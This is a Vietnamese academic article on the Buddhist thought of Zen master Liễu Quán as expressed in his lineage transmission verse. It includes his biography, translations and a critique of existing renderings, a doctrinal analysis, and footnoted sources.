THÍCH QUẢNG AN
“Tư tưởng là sự phản ánh hiện thực trong ý thức, là biểu hiện của con người với thế giới xung quanh”[1]. Nói cách khác, tư tưởng là cách nhìn một sự vật, hiện tượng… của cá nhân hay một cộng đồng nào đó mà ngôn ngữ và hành động là phương tiện để biểu đạt tư tưởng ấy. Không phải ngẫu nhiên chúng tôi đề cập đề cập đến “Tư tưởng thiền sư Liễu Quán qua bài kệ truyền thừa” mà bởi “Tổ Liễu Quán thật đã có một vị trí sáng chói trong lịch sử Phật giáo cuối đời Hậu Lê”[2]. Có thể nói, tư tưởng của thiền sư Liễu Quán là đại diện cho tư tưởng Phật giáo thời Lê Mạt ở Đàng Trong. Kệ truyền thừa không chỉ mang ý nghĩa về sự truyền thừa tông phái, phân định thế hệ mà còn biểu đạt sâu sắc, cô đọng tư tưởng, sở hành sở chứng của một vị thiền sư. Đó là một sự thật dễ dàng nhận thấy, nên phân tích kệ truyền thừa là việc cần chú trọng.
Nói đến Phật giáo thời Lê Mạt ở Đàng Trong, nhất định phải đề cập đến tư tưởng Phật giáo thời ấy, đề cập đến Phật giáo thời ấy, không thể không đề cập đến tư tưởng của thiền sư Liễu Quán và khi đề cập đến tư tưởng của thiền sư Liễu Quán thì không thể bỏ quên bài kệ truyền thừa. Đó chính là lý do của bài viết này.
Để rõ hơn về tư tưởng của thiền sư Liễu Quán, thiết nghĩ trước tiên cần khái lược tiểu sử của Ngài.
- TÓM LƯỢC TIỂU SỬ THIỀN SƯ LIỄU QUÁN
“Ngài Liễu Quán làng Bạc Mã, huyện Đồng Xuân, phủ Phú Yên, họ Lê, pháp danh Thiệt Diệu, hiệu Liễu Quán. Tu học từ thuở nhỏ, Ngài tỏ ra thông minh khí tiết hơn các bạn đồng học. Mất mẹ năm lên sáu, theo ý nguyện của Ngài, thân phụ Ngài đã gởi Ngài đến chùa Hội Tôn thụ giáo với Tế Viên Hòa thượng. Bảy năm sau Tế Viên Hòa thượng tịch, Ngài ra Huế vào chùa Hàm Long (tức chùa Bảo Quốc ngày nay) thụ học với Giác Phong lão tổ.
Năm Tân tị (1691), sau khi xuống tóc được một năm, Ngài được gọi về làng cũ để giúp đỡ phụ thân trong lúc già yếu. Nhà nghèo, Ngài phải đi hái củi bán lấy tiền lo thuốc thang. Bốn năm sau phụ thân qua đời.
Vào năm Ất hợi (1695) Ngài lại trở ra Huế chính thức thụ giới Sa-di với Hòa thượng Thạch Liêm Đại Sán. Năm Đinh sửu (1697), Ngài tiếp tục thụ giới Cụ túc với Hòa thượng Từ Lâm.
Năm Kỹ mão (1699), Ngài đi khắp Tòng Lâm thăm viếng nhiều chùa để học hỏi đạo lý, và quyết định hiến thân cho đời sống đạo, chẳng quản đạm bạc gian lao. Từ đó Ngài tinh chuyên tu tập.
Năm Nhâm ngọ (1702), Ngài đến Long Sơn đầu sư với Tử Dung Hòa thượng (người sáng lập Ấn Tôn Từ Đàm hiện nay), một vị Hòa thượng có tiếng thông thái khéo dạy người niệm Phật tham Thiền của thời này.
Trước khi chấp nhận Ngài làm học trò, Hòa thượng Tử Dung đã thử nhiều lần và bắt Ngài giải thích câu sau đây: “Muôn pháp quy về một, một về đâu?”. Ngài đã tìm kiếm 8, 9 năm không ra câu giải đáp và đã thất vọng.
Một hôm, nhân đọc Truyền Đăng Lục, Ngài gặp câu: “Chỉ vật truyền tâm, nhân bất hội xứ” (Chỉ vật để truyền tâm, chỗ mà người ngoại cuộc không hiểu được), bỗng nhiên Ngài thấy đã tìm ra câu giải đáp, nhưng vì đường sá xa cách, không thể đến trình chỗ ngộ với thầy ngay được.
Năm Mậu tý (1708) Ngài đến Long Sơn (Huế) để đệ trình kết quả với câu: “Chỉ vật truyền tâm, nhân bất hội xứ”.
Hòa thượng Tử Dung lại dạy:
– Đứng ở mé bờ cao vút buông tay, tự mình chịu lấy, chết rồi sống lại, bấy giờ không ai có thể dối người. (Huyền nhai tán thủ, tự khẳng thừa đương, tuyệt hậu tái tô, khi quân bất đắc).
– Ngài vỗ tay cười lớn tiếng.
Hòa thượng nói:
– Không phải vậy đâu.
Ngài liền đọc:
– Cái dùi nguyên là sắt. (Xứng chùy nguyên thị thiết. )
Hòa thượng đáp:
– Cũng không phải.
Hôm sau Hòa thượng lại tiếp tục thử Ngài, bảo: “Công án ngày qua chưa giải đáp xong, hãy nói lại xem?”.
Ngài liền đọc hai câu:
– Sớm biết đèn là lửa.
Cơm chín đã lâu rồi.
Hòa thượng tán thán.
Năm Nhâm thìn (1712), khi Hòa thượng Tử Dung vào Quảng Nam để làm lễ Toàn Viện (?) Ngài Liễu Quán trình Hòa thượng bài kệ dục Phật (tắm Phật). Xem bài kệ, Hòa thượng hỏi:
– Tổ Tổ truyền cho nhau, Phật Phật trao cho nhau, chưa rõ truyền trao cái gì?
Ngài Liễu Quán đáp:
– Măng đá mọc chồi dài một trượng
Phủ phất lông rùa nặng ba cân.
Hòa thượng Tử Dung tiếp hỏi:
– Thuyền trượt trên núi cao, ngựa chạy dưới đáy biển, nghĩa là gì?
Ngài đáp:
– Trâu đất gãy sừng rống thâu đêm, đàn cầm không giây gảy suốt ngày.
Rồi Ngài chép lại tất cả những câu đối đáp trình ngay lên Hòa thượng Tử Dung và được Hòa thượng hoàn toàn thừa nhận.
Ngài là người có trí thông minh phi thường, chí nguyện siêu việt.
Năm Nhâm dần (1722) Ngài về trụ ở Tổ đình Thiền Tôn – Huế. Trong các năm Quý sửu. Giáp dần, Ất mão (1733, 1734, 1735) Ngài mở bốn đại giới đàn theo lời thỉnh cầu của các hàng cư sĩ, xuất gia và các quan viên hộ pháp. Năm Canh thân (1740) sau khi truyền giới đàn Long Hoa, Ngài trở lại tổ đình.
Đương thời Hiếu Minh vương Nguyễn Phúc Chu (1691-1725)[3] cảm phục đạo đức và danh tiếng của Ngài, triệu Ngài vào cung, nhưng Ngài muốn giữ sự tự tại ở chốn lâm tuyền nên đã từ tạ lời thỉnh mà không đến.
Mùa xuân năm Nhâm tuất (1742) Ngài lại mở giới đàn tại chùa Viên Thông. Vào cuối thu, tháng 9 năm ấy (tháng 10 năm 1742) Ngài lâm bịnh nhưng không có dấu hiệu gì trầm trọng. Tháng 10 năm ấy, Ngài họp các đệ tử nói: “Tôi sẽ ra đi, sứ mạng của tôi ở đời này đã xong”. Các đệ tử khóc òa. Ngài khuyên bảo: “Tại sao các vị khóc? Chư Phật còn nhập Niết-bàn. Tôi cũng vậy, tôi đến đi rõ ràng, về có nơi chốn. Xin đừng buồn rầu, hãy cố gắng tinh tấn hơn lên”.
Tháng 11 âm lịch năm ấy, mấy ngày trước khi mất, Ngài ngồi dậy tự tay viết bốn câu:
“Ngoài bảy mươi năm trong thế giới
Không không sắc sắc thấy dung thông
Ngày nay nguyện mãn về nơi cũ
Nào phải ân cần hỏi tổ tông“.
Viết xong, Ngài bảo các đệ tử: “Các vị xem này, tôi đến với cõi đời này giản dị biết bao nhiêu. Tôi sẽ ra đi trọn vẹn. Mai sau các vị hãy áp dụng thực hành Thánh hạnh. Xin hãy cố gắng chớ quên lời dạy bảo của tôi”.
Ngày 22 tháng 11 năm Nhâm tuất (tháng 12 năm 1742) sau khi dùng trà, hành lễ buổi sáng, Ngài hỏi đệ tử mấy giờ. Các đệ tử đáp bây giờ là giờ mùi (khoảng 1 đến 3 giờ chiều), Ngài thở hơi cuối cùng.
Chúa Minh vương Nguyễn Phúc Chu[4] ban thụy hiệu là Chánh Giác Viên Ngộ Hòa thượng để khắc bia.
Di thể được chuyển mai táng ngày 19 tháng 2 năm Quý hợi (1743) ở ngôi tháp mới nằm phía Nam núi Thiên Thai, trên thửa đất làng An Cựu, huyện Hương Trà, tỉnh Thừa Thiên (cũ).
Ngài Liễu Quán sinh giờ Thìn (khoảng 7 đến 9 giờ sáng) ngày 13 tháng 11 năm Đinh Mùi (1667), viên tịch ngày 22 tháng 11 năm Nhâm tuất, niên hiệu Cảnh Hưng thứ III (1742), 43 tuổi hạ, 76 tuổi đời, độ 49 đệ tử xuất gia danh tiếng và rất đông đệ tử tại gia.”[5]
- KỆ TRUYỀN THỪA
Như vây, tiếp nối chánh tông dòng Lâm Tế từ thiền sư Trung Hoa là Ngài Minh Hoằng- Tử Dung, thiền sư Liễu Quán thuộc dòng Lâm Tế, đời thứ 35. Đặc biệt, Ngài đã biệt xuất bài kệ truyền thừa khác:
Thiệt tế đại đạo “寔實際大道
Tánh hải thanh trừng. 性海清澄
Tâm nguyên quảng nhuận 心源廣潤
Đức bổn từ phong. 德本慈風
Giới định phước tuệ 戒定福慧
Thể dụng viên thông. 體用圓通
Vĩnh siêu trí quả 永超智果
Mật khế thành công. 密契成功
Truyền trì diệu lý 傳持妙理
Diễn xướng chánh tông. 演暢正宗
Hạnh giải tương ưng 行解相應
Đạt ngộ chân không.[6] 達悟真空”[7]
Tạm dịch:
Lý thể chân như vốn mênh mông thăm thẳm như biển, đó là nguồn tâm rộng lớn vô cùng, bủa khắp mọi nơi. Người đạt được tâm này thì bên trong có đức làm gốc, bên ngoài biểu hiện phong cách và phẩm hạnh từ bi; tự đầy đủ giới, định, tuệ và phước, thể dụng dung thông không ngăn ngại, cho nên vĩnh viễn đoạn lìa sanh tử, chứng đắc bồ-đề. Những thành tựu đó tương quan tương liên một cách mật thiết.
Người thành tựu như thế có thể giữ gìn và hoằng dương đạo lý thâm diệu, phát huy tông phong chân truyền, khiến cho người học đạo có sự nhất trí giữa lý thuyết và thực hành, đưa đến thể nhập lý thể chân như.
Có rất nhiều bản dịch về bài kệ này, bản dịch của Nguyễn Lang được nhiều sách vở sử dụng nhất:
“Đường lớn thực tại
Biển thể tính trong
Nguồn tâm thấm khắp
Gốc đức vun trồng
Giới định phước huệ
Thể dụng viên thông
Quả trí siêu việt
Hiểu thấu nên công
Truyền giữ lý mầu
Tuyên dương chính tông
Hành giải song song
Đạt ngộ chân không.”[8]
Theo chúng tôi, ưu điểm của bản dịch này là giữ lại được thể kệ và đọc nghe rất êm, tuy nhiên không thể biểu đạt hết tư tưởng và có một vài chỗ khiên cưỡng. Chẳng hạn: câu “đường lớn thực tại” được dịch từ câu “thật tế đại đạo”. ‘Đại đạo’ là đường lớn, ‘thật tế’ là thực tại, bên ngoài có vẻ như chính xác sát nghĩa, nhưng đây là thuật ngữ Phật học cần phải minh xác lại. Từ điển Phật Học Đinh Phúc Bảo trích Đại trí độ luận để giải thích từ ‘thật tế’ như sau:「實際者以法性為實證,故為際。(中略)善入法性,是為實際。」[9] nghĩa là: Thật Tế là lấy pháp tánh làm thật chứng nên gọi là ‘tế’(…), khéo nhập vào pháp tánh đó là ‘thật tế’. Phật Quang đại từ điển giải thích từ này: “梵語 bhūta-koṭi。真實際極之意。即指絕離虛妄之涅槃實證;又指真如之理體。”[10] (Thật tế chữ Phạn là bhūta-koṭi. Ý là sự chân thật cao nhất, tức chỉ cho thực chứng Niết-bàn hoàn toàn xa lìa hư vọng, còn có nghĩa chỉ cho lý thể chân như). Như vậy, ‘thật tế’ cần được hiểu là lý thể chân như. Một cảnh giới đạt chứng tối cao mà Phật Phật tương truyền, tổ tổ ấn chứng. Đó cũng chính là ‘đại đạo’. Diệu kinh văn cú tư chí ký ghi: “大道者即證極理體也”[11] (đại đạo tức là chứng đắc lý thể tuyệt đối).
Câu “gốc đức vun trồng” được dịch từ câu “đức bổn từ phong”. Như vậy hai chữ ‘từ phong’ được thay thế bởi từ ‘vun trồng’. Đây là từ thêm vào cho dễ hiểu và êm vận, thật ra nó chẳng ăn nhập gì đến ‘từ phong’ mặt khác còn làm mất đi ý nghĩa của nó. Chính Hòa thượng Thích Nhất Hạnh đã giải thích ‘từ phong’ như sau: “Từ phong tức là một nền văn minh, một nếp sống từ bi. Phong ở đây là phong cách, là một nếp sống, một truyền thống.”[12]
Câu “quả trí siêu việt” được dịch từ câu “vĩnh siêu trí quả”. Chưa nói đến ‘trí quả’ có phải là quả trí hay không, chỉ cần nhận định ‘vĩnh siêu’ trở thành ‘siêu việt’ đã là sự khiên cưỡng và bớt ý. Hòa Thượng Thích Nhất Hạnh cũng giải thích từ này: “Hoa trái của trí tuệ mà mình đạt tới giúp mình vượt thoát vĩnh viễn những hệ lụy, những khổ đau, gọi là vĩnh siêu. Siêu tức là vượt thoát, vĩnh có nghĩa là vĩnh viễn.”[13] Như vậy, ‘trí quả’ ở đây được hiểu là ‘hoa trái của trí tuệ’. Từ điển Phật học của Đinh Phúc Bảo ghi: “涅槃曰斷果,菩提曰智果。以菩提為佛智,由因地修行而生之妙果也”[14] (Niết-bàn là đoạn quả, Bồ-đề là trí quả, vì bồ đề là Phật trí, do nhân địa tu hành mà diệu quả phát sanh). Nếu ‘vĩnh siêu’ là “vĩnh viễn vượt thoát những hệ lụy” thì ‘trí quả’ nhất định phải là bồ-đề mới tương hợp.
Câu “đạt ngộ chân không” không được dịch ra vì cảm nhận thoáng qua thấy rằng câu này dễ hiểu. Nhưng chân không là gì? Từ điển Phật học của Đinh Phúc Bảo giải thích: “真如之理性離一切迷情所見之相,故云真空。”[15] (lý tánh chân như xa lìa tất cả tướng hư vọng nên gọi là chân không). Như vậy, câu cuối cùng của bài cũng đã trở lại lý tánh chân như. Đây là chủ đích của thiền sư, chúng tôi sẽ trình bày ở phần phân tích tư tưởng.
Xin được dẫn thêm một tư liệu diễn dịch về ý của bài kệ này: “Đạo thực tế là tính hải (Tính) trong sạch. Nguồn Tâm bao la êm ả. Gốc đức như luồng gió lành (từ, từ bi). Giới, định, tuệ Thể (bản thể), Dụng (hiện tượng) viên thông, siêu việt nhận thức, ngầm khế hợp mà thành. Truyền trì diệu lý (giáo lý Phật giáo), hoằng dương chánh tông (tông Lâm Tế), may mắn mà đạt đến chân không.”[16] Chúng tôi cho rằng sự diễn dịch như thế này mang tính chủ quan, không những mập mờ khó hiểu mà còn có thể dẫn đến nhận thức sai lệch về bài kệ.
Dịch một văn bản nhất là thi kệ chữ Hán của các vị tổ sư Phật giáo là một vấn đề hết sức khó khăn, vì từ nghĩa đa hàm, ý tứ cô đọng, đa phần lại sử dụng thuần từ Phật học, do đó người dịch đòi hỏi phải vốn liếng Phật học và Hán học nhất định. Mặt khác, cần dịch theo thể thi kệ để thưởng lãm, nhưng cũng cần dịch thành văn xuôi để toát được nội dung.
- TƯ TƯỞNG BÀI KỆ TRUYỀN THỪA
Thiền sư Liễu Quán đắc pháp với thiền sư Minh Hoằng-Tử Dung có hiệu là Thật Diệu truyền theo bài kệ:
“Tổ đạo giới định tông
Phương quảng chứng viên thông
Hành siêu minh thật tế
(…) Tương kế chấn từ phong.”[17]
Tuy nhiên từ chữ ‘thật tế’ của dòng kệ này, Ngài lại biệt xuất dòng kệ khác như trên đã trình bày để truyền pháp. Điều đó đã nảy sinh vấn đề: Tại sao Ngài lại đặt một bài kệ khác để truyền thừa?
Phải chăng tiếp nối từ mạch nguồn thiền Trung Hoa, Ngài muốn có một dòng thiền mang đậm nét Việt Nam? Phải chăng Ngài muốn đánh một dấu mốc quan trọng, một chứng cứ lịch sử cho dòng thiền Việt? Và phải chăng đó là ý thức dân tộc, là bản sắc cần có của người Việt. Có lẽ chính vì tư tưởng chủ đạo như thế nên sự hành hóa của Ngài đã mang một phong cách mới, một phong cách Việt như Nguyễn Lang đã nhận xét: “Thiền sư Liễu Quán đã làm cho thiền phái Lâm Tế, trở thành một thiền phái linh động, có gốc rễ ở Đàng Trong. Trước ông Phật giáo Đàng Trong mang nặng màu sắc Quảng Đông. Ông đã Việt hóa thiền phái Lâm Tế, và làm cho thiền phái này trở thành thiền phái của đa số Phật tử Đàng Trong.”[18]
Đã bàn đến động cơ xuất kệ, giờ đây có thể đi thẳng vào nội dung của bài kệ. Nội dung của bài kệ có thể chia thành 2 phần: trình bày cảnh giới chứng đắc và sau khi chứng đắc.
– Cảnh giới chứng đắc:
“Lý thể chân như vốn rộng sâu như biển, ấy là nguồn tâm rộng lớn vô cùng, bủa khắp mọi nơi.”
Theo Phật giáo, chứng đắc thật sự chẳng chứng đắc gì cả, chẳng qua là trạng thái ‘thủy giác’ trở về với ‘bản giác’, nguồn tâm trở về với thể tính chân như trong lặng tịch chiếu. Nguồn tâm ấy không bị hạn cuộc bởi thời gian, không gian và có mặt khắp mọi nơi.
“Người đạt được tâm này thì bên trong có đức làm gốc, bên ngoài hạnh biểu từ bi”: Trở về với nguồn tâm trong lặng, người ấy bên trong tự có đạo đức, mà biểu hiện bên ngoài phẩm hạnh từ bi. Một sự tự nhiên không miễn cưỡng không cố gắng. Xin mượn lời Lão Tử để diễn đạt ý này: “Thượng đức bất đức thị dĩ hữu đức, hạ đức bất thất đức thị dĩ vô đức”[19] (Người đức lớn không cần tuân thủ theo quy tắc đạo đức mà vẫn đúng với đạo đức bởi trong lòng họ sẵn có đạo đức; người chưa có đức lớn thì phải luôn luôn tuân thủ theo quy tắc đạo đức thì mới đúng với đạo đức, bởi trong lòng họ chưa sẵn có đạo đức).
“Tự đầy đủ giới, định, tuệ và phước”: Giới định tuệ là nền tảng thành tựu đại đạo, thể nhập chân như không chỉ giới, định, tuệ tròn đầy mà phước báo cũng sung mãn.
“Thể dụng dung thông không ngăn ngại.”: Thể là thể tính, là thực tướng chân lí bất biến, không phân biệt; Dụng là tác dụng, là sự biểu hiện cụ thể các hiện tượng sai biệt. Từ thể khởi lên dụng, từ dụng trở về thể, thể dụng chẳng hai, chẳng khác. Đó gọi là dung thông không ngăn ngại.
“Người ấy vĩnh viễn đoạn lìa sanh tử, chứng đắc bồ-đề.” Đã thể nhập chân như thì gọi là giải thoát giác ngộ. Giải thoát nên không còn chịu sự ràng buộc hệ lụy của sanh tử; giác ngộ nên được đạo bồ-đề.
“Những thành tựu đó tương quan tương liên một cách mật thiết.” Từ sự thể nhập lý thể chân như cho đến vĩnh viễn xa lìa sinh tử mà thiền sư đã trình bày là một chuỗi mắc xích, tương quan tương liên, một chuỗi quan hệ nhân quả vô cùng khắn khít. Trong đó, chính nhân là thể nhập lý thể chân như và những thành tựu tiếp theo là sự phân diễn về quả.
Như vậy, cảnh giới chứng đắc không gì khác là trở về và sống với nguồn tâm trong lặng, sống được với nguồn tâm trong lặng ấy thì đầy đủ phước đức trí tuệ. Đặt trên nền tảng của nguồn tâm này mà làm muôn việc thì việc nào cũng mang giá trị, ý nghĩa từ bi, an lạc, giải thoát. Các thiền sư đạt ngộ đều đồng trải nghiệm tâm thức này nên có sự an lạc tự tại trong cuộc sống đồng thời rõ biết chỗ đến đi của mình.
-Sau khi chứng đắc:
“Người thành tựu như thế có thể giữ gìn và hoằng dương đạo lý thâm diệu đó nhằm phát huy tông phong chân truyền, khiến cho người học đạo có sự nhất trí giữa lý thuyết và thực hành, đưa đến thể nhập lý thể chân như.”
Giống như người mắt sáng mới có thể dắt dẫn người mù; người đã tự tại trong sinh tử mới có khả năng dẫn người khác vượt qua bờ sanh tử. Hoằng dương đạo lý là bản nguyện và trách nhiệm của người đã liễu ngộ. Áp dụng sự chứng ngộ hướng dẫn cho người nhằm phát huy tông phong cũng chính là cách đền đáp ơn sâu của Phật tổ. “Giáo lý đạo Phật là cái gì có thể nắm bắt và thực chứng”[20] đòi hỏi sự hợp nhất giữa lý thuyết và thực hành, dưới sự hướng dẫn của bậc minh sư mới có cơ hội đạt ngộ giải thoát. Đức Phật dạy: “Tất cả chúng sanh đều có khả năng đạt ngộ giải thoát”[21] và mục đích ra đời của chư Phật cũng không gì khác là “chỉ bày cho chúng sinh thấy được vào được cảnh giới lý thể chân như”[22].
Từ đó cho thấy tư tưởng của thiền sư Liễu Quán cũng chẳng có gì mới, Ngài lấy bản nguyện của chư Phật làm bản nguyện của mình, có mới chăng là ngôn từ đổi mới. Điều này còn biểu đạt trình độ đạt chứng tâm tông của Ngài, nếu tư tưởng của Ngài lệch quỹ đạo này thì nhất định Ngài không được thiền sư Minh Hoằng Tử Dung ấn chứng. Và cũng chính từ tưởng này dẫn khởi cho công hạnh hoằng hóa của Ngài tỏa sáng trên dải đất miền trung dài rộng từ Thuận Hóa đến Phú Yên.
Đề cập đến tư tưởng bài kệ, Nguyễn Duy Hinh viết: “Bài kệ này mang nội dung tư tưởng: tính hải, tâm nguyên, thể dụng viên thông, chân không. Là những quan điểm tổng hợp của nhiều chi phái mà các thiền sư thế kỷ XI-XIV nước Đại Việt đã nghiên cứu trước đó hơn 500 năm. Nhưng vì là đất mới đặt nền nên tất nhiên Liễu Quán phải trở lại những vấn đề giáo lý cơ bản trong điều kiện tiếp thu truyền thống Phật giáo Đại Việt. Đó chính là một đặc điểm nữa của Lâm Tế Đàng Trong[23]. Thực ra, những nội dung tư tưởng ‘tính hải’, ‘tâm nguyên’… bàng bạc trong kinh điển Phật giáo Đại thừa như kinh Hoa Nghiêm, Viên Giác, Lăng Nghiêm… và đây là những tư tưởng cội nguồn trọng yếu, chủ đạo trong thiền học, nên không phải trước đó hay sau đó 500 năm mà xuyên suốt các thời đại, không phải Bắc, Nam, đất cũ đất mới mà sai khác. Tất cả đều nhất quán trên cơ sở tư tưởng chủ đạo ấy. Một bài kệ mang ý nghĩa truyền thừa, một bài kệ mang tính cốt tủy tư tưởng của một thiền sư thì phải đặt trên nền tảng cốt tủy của thiền tông là điều tất yếu.
Tóm lại, qua bài kệ truyền thừa có thể nhận thấy rằng tư tưởng của thiền sư Liễu Quán được tiếp nối từ cội nguồn Phật tổ. Bằng những yếu lý nền tảng của thiền tông, Ngài đã trình bày mối quan hệ nhân quả của cảnh giới thực chứng và con đường đi đến thể nhập cảnh giới ấy. Đó cũng chính là diệt đế và đạo đế trong giáo lý tứ đế của Phật giáo. Điều này không có gì mới nhưng rất mới, bởi bằng sự đạt chứng của vị tổ sư khéo vận dụng hạnh giải tương ưng; tư tưởng đó đã tỏa sáng một cách thiết thực theo công hạnh của Ngài. Từ Thuận Hóa đến Phú Yên, dấu chân của Ngài không quản ngại nắng mưa, nhẫn nại ươm mầm Phật pháp cho mai hậu. Hàng đệ tử con cháu của Ngài đã thừa tiếp tư tưởng và chí nguyện trên, truyền bá tông phong mỗi ngày thêm sâu rộng vào vùng đất mới miền Nam. Có thể nói rằng dòng Lâm Tế thiền phái Liễu Quán từ khi hình thành cho đến ngày nay đã phát triển mạnh mẽ, liên tục, có đóng góp lớn cho Phật giáo miền Trung, miền Nam nói riêng và Phật giáo Việt Nam nói chung. Sở dĩ có được thành tựu như vậy bởi khai nguyên tư tưởng của thiền phái này đã xứng hợp với tâm tông trong tinh thần ý thức dân tộc sâu sắc./.
TÀI LIỆU THAM KHẢO
- Bộ giáo dục và đạo tạo, Giáo trình tư tưởng Hồ Chí Minh, NXB Chính trị Quốc gia, H, 2009, tr 9.
- Nhiều tác giả, Phật giáo trong thời đại chúng ta, NXB Tôn Giáo, H. 2005, tr. 358
- Nguyễn Lang, Việt Nam Phật giáo sử luận, NXB. Văn Học, H. 2011, tr 603.
- Nguyễn Duy Hinh, Tư tưởng Phật giáo Việt Nam, tập II, NXB. Khoa học xã hội, Hà Nội, H.1999, tr 695.
- Vân Thanh, Lược khảo Phật giáo sử Việt Nam qua các thời đại và phát nguồn của các giáo phái Phật giáo, tập I, Phật lịch 2518, tr 150
- Lão Tử, Đạo đức kinh, nguồn:
http://www.yasue.cc/to_dak_ging.html
- http://langmai.org/phapduong/phap-thoai-phien-ta/truyen-thua-cua-phai-lieu-quan.
- http://www.plumvillage.org/about-our-lineage.html
- Thích Thiện Siêu, Thiền sư Liễu Quán, nguồn: http://www.quangduc.com/file_chinh/view-detail-7514-3-295-nhan_vat_vn.html.
- Từ điển điện tử Babylon.
- Đại chánh tạng kinh, Cbeta.
[1] Bộ giáo dục và đạo tạo, Giáo trình tư tưởng Hồ Chí Minh, NXB Chính trị Quốc gia, H. 2009, tr 9
[2] Thích Thiện Siêu, Thiền sư Liễu Quán, nguồn: http://www.quangduc.com/file_chinh/view-detail-7514-3-295-nhan_vat_vn.html.
[3] Theo Thích Thái Hòa “Các chúa Minh Vương – Nguyễn Phúc Chu (1691 – 1725), Ninh Vương – Nguyễn Phúc Chú (1725 -1738), Võ Vương – Nguyễn Phúc Khoát (1738 – 1765), nghe danh đức và đạo phong của Tổ, đã nhiều lần cung thỉnh Tổ vào phủ Chúa để tham học, nhưng Tổ đều từ chối, vì chỉ ưa thích sống với núi rừng” (Nguồn:http://phapluan.vn/vanhoc/lich-su/nhan-vat/2381-to-su-thiet-dieu-lieu-quan). Còn theo Nguyễn Lang, Việt Nam Phật giáo sử luận, Sđd, tr 601 là chúa Nguyễn Phúc Khoát (1714-1765). Xét thấy 3 đời chúa đều sùng tín đạo Phật, hơn nữa thiền sư Liễu Quán (1667-1742) sống với 3 đời chúa. Năm 42 tuổi (1709)“ Ông đã có nhiều đạo tràng hành đạo như chùa Thiền Tôn, chùa Viên Thông (Thuận Hóa) và các chùa Hội Tông, Cổ Lâm và Bảo Tịnh ở Phú Yên” (Nguyễn Lang, Sđd, tr 601). Điều này chứng tỏ khi thiền sư thành danh, nhất định chúa Nguyễn Phúc Chu cũng đã biết đến, do đó cũng có thể nói rằng cả 3 chúa đều có thỉnh Ngài vào cung nhưng Ngài đều từ chối và giữ vững lập trường của mình. Tuy nhiên để xác định một trong 3 chúa thỉnh Ngài, theo chúng tôi phải là Ninh Vương Nguyễn Phúc Chú. Có 2 lý do: thứ nhất, Thời chúa Nguyễn Phúc Chu thì còn các bậc thầy của thiền sư Liễu Quán và lúc đó thiền sư cũng mới thành danh nên việc thỉnh Ngài vào cung khó có thể xảy ra. Thời gian chúa Nguyễn Phúc Chú ở ngôi (1725-1738) là thời gian mà đạo hạnh của thiền sư Liễu Quán tỏa sáng nhất khiến chúa Ninh Vương mến đức mà thỉnh vời. thứ 2, các vị tôn đức bậc thầy của thiền sư Liễu Quán cũng đã già suy và viên tịch nên có thể nói giai đoạn này ở Đàng Trong thiền sư Liễu Quán là người nổi bậc, vì thế mà chúa cho thỉnh vời. Còn thời chúa Nguyễn Phúc Khoát lên ngôi (1738) lúc đó thiền sư Liễu Quán đã 72 tuổi và 4 năm sau thì Ngài mất (1742) thì đây là thời gian theo thế thường Ngài đã già suy, hơn nữa chúa mới lên ngôi cho xây dựng phủ mới (1738-1739) lại với bao công việc đối nội đối ngoại nên ít có khả năng chúa cho thỉnh thiền sư về phủ hỏi đạo.
[4] Theo bản dịch này (Nguồn: Thích Thiện Siêu, http://www.quangduc.com/file_chinh/view-detail-7514-3-295-nhan_vat_vn.html. ) chúa Nguyễn Phúc Chu là người ban thụy hiệu ‘Chánh Giác Viên Ngộ Hòa thượng.’ nhưng theo Nguyễn Nguyễn Lang, Việt Nam Phật giáo sử luận, Sđd, tr 602 thì thụy hiệu của Ngài là do chúa Vũ Vương Nguyễn Phúc Khoát ban. Thuyết này hợp lý hơn vì chúa Nguyễn Phúc Chu đã mất năm 1725 trước ngài 17 năm nên không thể ban thụy hiệu khi Ngài viên tịch.
[5] Tiểu sử của thiền sư Liễu Quán có rất nhiều nguồn, đại để là đại đồng tiểu dị. Đoạn trích trên được dịch từ văn bia chữ Hán ở tháp thiền sư Liễu Quán, do sư Thiện Kế, trụ trì chùa Tang Liên (Trung Quốc) soạn và dựng năm thứ 9 niên hiệu Cảnh Hưng (1748, vua Lê Hiển Tôn), đúng 6 năm sau ngày Tổ Liễu Quán viên tịch. Thiết nghĩ đây là nguồn tư liệu có cơ sở gốc nên chúng tôi đưa vào.
[6] Nguyễn Lang, Việt Nam Phật giáo sử luận, NXB Văn học, H, 2011, tr 603.
[7] Nguồn http://www.plumvillage.org/about-our-lineage.html
[8] Nguyễn Lang, Việt Nam Phật giáo sử luận, Sđd, tr 603.
[9] Từ điển điện tử Babylon.
[10] Từ điển điện tử Babylon.
[11] Đại tạng kinh, Cbeta, X29n0596_p0228b23-b24.
[12] http://langmai.org/phapduong/phap-thoai-phien-ta/truyen-thua-cua-phai-lieu-quan.
[13] Như link ở chú thích 10.
[14] Từ điển điện tử Babylon
[15] Từ điển điện tử Babylon
[16] Nguyễn Duy Hinh, Tư tưởng Phật giáo Việt Nam, tập II, NXB Khoa học xã hội, H, 1999, tr 695.
[17] Vân Thanh, Lược khảo Phật giáo sử Việt Nam qua các thời đại và phát nguồn của các giáo phái Phật giáo, tập I, Phật lịch 2518, tr 150
[18] Nguyễn Lang, Việt Nam Phật giáo sử luận, Sđd tr 604.
[19] Lão Tử, Đạo đức kinh, chương 38, câu 1.
[20] Nhiều tác giả, Phật giáo trong thời đại chúng ta, NXB Tôn giáo, H, 2005, tr. 358.
[21] 一切衆生皆有佛性- Đại chánh tạng cbeta, T12n0374_p0404c04-c5.
[22] 欲示眾生佛之知見故,出現於世;欲令眾生悟佛知見故,出現於世;欲令眾生入佛知見道故,出現於世- Đại chánh tạng cbeta, T09n0262_p0007a25_a27.
